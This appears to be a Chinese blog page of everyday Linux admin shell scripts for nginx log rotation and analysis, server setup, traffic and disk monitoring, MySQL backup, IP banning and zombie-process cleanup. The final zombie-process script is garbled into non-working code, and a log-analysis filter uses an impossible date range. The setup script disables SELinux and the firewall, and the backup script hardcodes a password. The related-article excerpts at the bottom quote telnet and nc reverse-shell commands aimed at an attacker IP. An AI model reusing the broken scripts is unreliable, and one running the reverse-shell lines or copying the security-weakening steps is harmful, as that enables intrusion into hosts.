<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    經常用得上的shell腳本

    VSole2022-12-15 09:43:45

    nginx日志按天切割

    #!/bin/bash
    LOG_DIR=/usr/local/nginx/logs
    YESTERDAY_TIME=$(date -d "yesterday" +%F)
    LOG_MONTH_DIR=$LOG_DIR/$(date +"%Y-%m")
    LOG_FILE_LIST="default.access.log"
    for LOG_FILE in $LOG_FILE_LIST; do
        [ ! -d $LOG_MONTH_DIR ] && mkdir -p $LOG_MONTH_DIR
        mv $LOG_DIR/$LOG_FILE $LOG_MONTH_DIR/${LOG_FILE}_${YESTERDAY_TIME}
    done
    kill -USR1 $(cat /usr/local/nginx/nginx.pid)
    

    nginx acc日志分析

    #!/bin/bash
    # 日志格式: $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" "$http_x_forwarded_for"
    LOG_FILE=$1
    echo "統計訪問最多的10個IP"
    awk '{a[$1]++}END{print "UV:",length(a);for(v in a)print v,a[v]}' $LOG_FILE |sort -k2 -nr |head -10
    echo "----------------------"
    echo "統計時間段訪問最多的IP"
    awk '$4>="[01/Dec/2018:13:20:25" && $4<="[27/Nov/2018:16:20:49"{a[$1]++}END{for(v in a)print v,a[v]}' $LOG_FILE |sort -k2 -nr|head -10
    echo "----------------------"
    echo "統計訪問最多的10個頁面"
    awk '{a[$7]++}END{print "PV:",length(a);for(v in a){if(a[v]>10)print v,a[v]}}' $LOG_FILE |sort -k2 -nr
    echo "----------------------"
    echo "統計訪問頁面狀態碼數量"
    awk '{a[$7" "$9]++}END{for(v in a){if(a[v]>5) print v,a[v]}}'
    

    服務器初始化

    #/bin/bash
    # 設置時區并同步時間
    ln -s /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
    if ! crontab -l |grep ntpdate &>/dev/null ; then
        (echo "* 1 * * * ntpdate time.windows.com >/dev/null 2>&1";crontab -l) |crontab
    fi
    # 禁用selinux
    sed -i '/SELINUX/{s/permissive/disabled/}' /etc/selinux/config
    # 關閉防火墻
    if egrep "7.[0-9]" /etc/redhat-release &>/dev/null; then
        systemctl stop firewalld
        systemctl disable firewalld
    elif egrep "6.[0-9]" /etc/redhat-release &>/dev/null; then
        service iptables stop
        chkconfig iptables off
    fi
    # 歷史命令顯示操作時間
    if ! grep HISTTIMEFORMAT /etc/bashrc; then
        echo 'export HISTTIMEFORMAT="%F %T `whoami` "' >> /etc/bashrc
    fi
    # SSH超時時間
    if ! grep "TMOUT=600" /etc/profile &>/dev/null; then
        echo "export TMOUT=600" >> /etc/profile
    fi
    # 禁止root遠程登錄
    sed -i 's/#PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
    # 禁止定時任務向發送郵件
    sed -i 's/^MAILTO=root/MAILTO=""/' /etc/crontab
    # 設置最大打開文件數
    if ! grep "* soft nofile 65535" /etc/security/limits.conf &>/dev/null; then
        cat >> /etc/security/limits.conf << EOF
        * soft nofile 65535
        * hard nofile 65535
    EOF
    fi
    # 系統內核優化
    cat >> /etc/sysctl.conf << EOF
    net.ipv4.tcp_syncookies = 1
    net.ipv4.tcp_max_tw_buckets = 20480
    net.ipv4.tcp_max_syn_backlog = 20480
    net.core.netdev_max_backlog = 262144
    net.ipv4.tcp_fin_timeout = 20
    EOF
    # 減少SWAP使用
    echo "0" > /proc/sys/vm/swappiness
    # 安裝系統性能分析工具及其他
    yum install gcc make autoconf vim sysstat net-tools iostat if
    

    查看網卡實時流量

    #!/bin/bash
    NIC=$1
    echo -e " In ------ Out"
    while true; do
        OLD_IN=$(awk '$0~"'$NIC'"{print $2}' /proc/net/dev)
        OLD_OUT=$(awk '$0~"'$NIC'"{print $10}' /proc/net/dev)
        sleep 1
        NEW_IN=$(awk  '$0~"'$NIC'"{print $2}' /proc/net/dev)
        NEW_OUT=$(awk '$0~"'$NIC'"{print $10}' /proc/net/dev)
        IN=$(printf "%.1f%s" "$((($NEW_IN-$OLD_IN)/1024))" "KB/s")
        OUT=$(printf "%.1f%s" "$((($NEW_OUT-$OLD_OUT)/1024))" "KB/s")
        echo "$IN $OUT"
        sleep 1
    done
    

    mysql 備份

    #!/bin/bash
    DATE=$(date +%F_%H-%M-%S)
    HOST=localhost
    USER=backup
    PASS=passwd
    BACKUP_DIR=/data/db_backup
    DB_LIST=$(mysql -h$HOST -u$USER -p$PASS -s -e "show databases;" 2>/dev/null |egrep -v "Database|information_schema|mysql|performance_schema|sys")
    for DB in $DB_LIST; do
        BACKUP_DB_DIR=$BACKUP_DIR/${DB}_${DATE}
        [ ! -d $BACKUP_DB_DIR ] && mkdir -p $BACKUP_DB_DIR &>/dev/null
        TABLE_LIST=$(mysql -h$HOST -u$USER -p$PASS -s -e "use $DB;show tables;" 2>/dev/null)
        for TABLE in $TABLE_LIST; do
            BACKUP_NAME=$BACKUP_DB_DIR/${TABLE}.sql
            if ! mysqldump -h$HOST -u$USER -p$PASS $DB $TABLE > $BACKUP_NAME 2>/dev/null; then
                echo "$BACKUP_NAME 備份失敗!"
            fi
        done
    done
    

    監控服務器磁盤利用率

    #!/bin/bash
    HOST_INFO=host.info  # 主機列表,實現采集多臺主機信息,需要能夠ssh到目標主機
    for IP in $(awk '/^[^#]/{print $1}' $HOST_INFO); do
        USER=$(awk -v ip=$IP 'ip==$1{print $2}' $HOST_INFO)
        PORT=$(awk -v ip=$IP 'ip==$1{print $3}' $HOST_INFO)
        TMP_FILE=/tmp/disk.tmp
        ssh -p $PORT $USER@$IP 'df -h' > $TMP_FILE
        USE_RATE_LIST=$(awk 'BEGIN{OFS="="}/^\/dev/{print $NF,int($5)}' $TMP_FILE)
        for USE_RATE in $USE_RATE_LIST; do
            PART_NAME=${USE_RATE%=*}
            USE_RATE=${USE_RATE#*=}
            if [ $USE_RATE -ge 80 ]; then
                echo "Warning: $PART_NAME Partition usage $USE_RATE%!"
            fi
        done
    done
    

    封禁大量惡意訪問的IP

    #!/bin/bash
    DATE=$(date +%d/%b/%Y:%H:%M)
    LOG_FILE=/usr/local/nginx/logs/access.log
    ABNORMAL_IP=$(tail -n10000 $LOG_FILE |grep $DATE |awk '{a[$1]++}END{for(i in a)if(a[i]>10)print i}')
    for IP in $ABNORMAL_IP; do
        if [ $(iptables -vnL |grep -c "$IP") -eq 0 ]; then
            iptables -I INPUT -s $IP -j DROP
            echo "$(date +'%F_%T') $IP" >> /tmp/drop_ip.log
        fi
    done
    

    統計進程數,找出并kill 僵尸進程

    #!/bin/ bash
    ALL_PROCESS=$(1s /proc/ l egrep "[0-9]+")
    running_count=0
    stoped_count=0s1eeping_count=0zombie_count=O
    for pid in ${ALL_PROCESS[*]}do
    test -f /proc/$pid/status && state=$(egrep "state"/proc/$pid/status / awk'{print $2}')
    case ""$state" in
    R)
    running_count=$ ((running_count+1))
    ;
    T)
    stoped_count=$((stoped_count+1))
    ;;
    s)
    sleeping_count=$((sleeping_count+1));
    z)
    zombie_count=$( (zombie_count+1)) echo "$pid" >>zombie.txt
    kill -9 "$pid"
    ;;
    esacdone
    echo -e "total:
    $((running_count+stoped_count+sleeping_count+zombie_count))running:$running_countstoped: $stoped_countsleeping: $sleeping_countzombie:$zombie_count"
    
    devawk
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Linux系統加固指南
    2021-09-08 08:51:48
    本幫助手冊旨在指導系統管理人員或安全檢查人員進行Linux操作系統的安全合規性檢查和加固。
    nginx日志按天切割#!awk '{a[$1]++}END{print "UV:",length;forprint v,a[v]}' $LOG_FILE |sort -k2 -nr |head -10. echo 'export HISTTIMEFORMAT="%F %T `whoami` "' >> /etc/bashrc. yum install gcc make autoconf vim sysstat net-tools iostat if. 查看網卡實時流量#!
    當企業發生網絡安全事件時,急需第一時間進行處理,使企業的網絡信息系統在最短時間內恢復正常工作,同時還需進一步查找入侵來源,還原入侵事故過程,給出解決方案與防范措施,為企業挽回或減少經濟損失。 常見的網絡安全事件:
    完成前2步還不夠,病毒一般會通過一些自啟動項及守護程序進行重復感染,所以我們要執行閉環兜底確保病毒不再被創建。將主機上的病毒項清除干凈后,最后就是進行系統加固了,防止病毒從Web再次入侵進來。走完這4個環節,才能算是一個應急響應流程的結束。
    顯示機器的處理器架構。/proc/cpuinfo 顯示CPU info的信息。/proc/swaps 顯示哪些swap被使用。/proc/net/dev 顯示網絡適配器及統計。/proc/mounts 顯示已加載的文件系統。顯示2007年的日歷表。設置日期和時間 - 月日時分年.秒。將時間修改保存到 BIOS. 取消按預定時間關閉系統。的目錄并同時刪除其內容。f -atime +100 搜索在過去100天內未被使用過的執行文件。結尾的文件并定義其權限。halt 顯示一個二進制文件或可執行文件的完整路徑。file.iso /mnt/cdrom 掛載一個文件或ISO鏡像文件
    是Linux中的一個特殊設備,打開這個文件就相當于發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數據。同理,Linux中還存在/dev/udp/。telnet反彈nc -lvvp 444 #攻擊者主機上執行監聽rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p #目標主機上執行。監聽兩個端口分別用來輸入和輸出,其中x.x.x.x均為攻擊者ip反彈shell成功后,在監聽4444端口的終端中執行命令可以在另一個終端中看到命令執行結果。 nc反彈nc -lvvp portnc -e /bin/bash x.x.x.x port
    linux運維道面試題
    2021-12-24 22:05:28
    linux運維面試題
    推薦值得收藏 40 個命令總結,助你效率提升多倍
    根據挖礦病毒行為特征,編寫專殺腳本,批量處置內網700多臺服務器
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类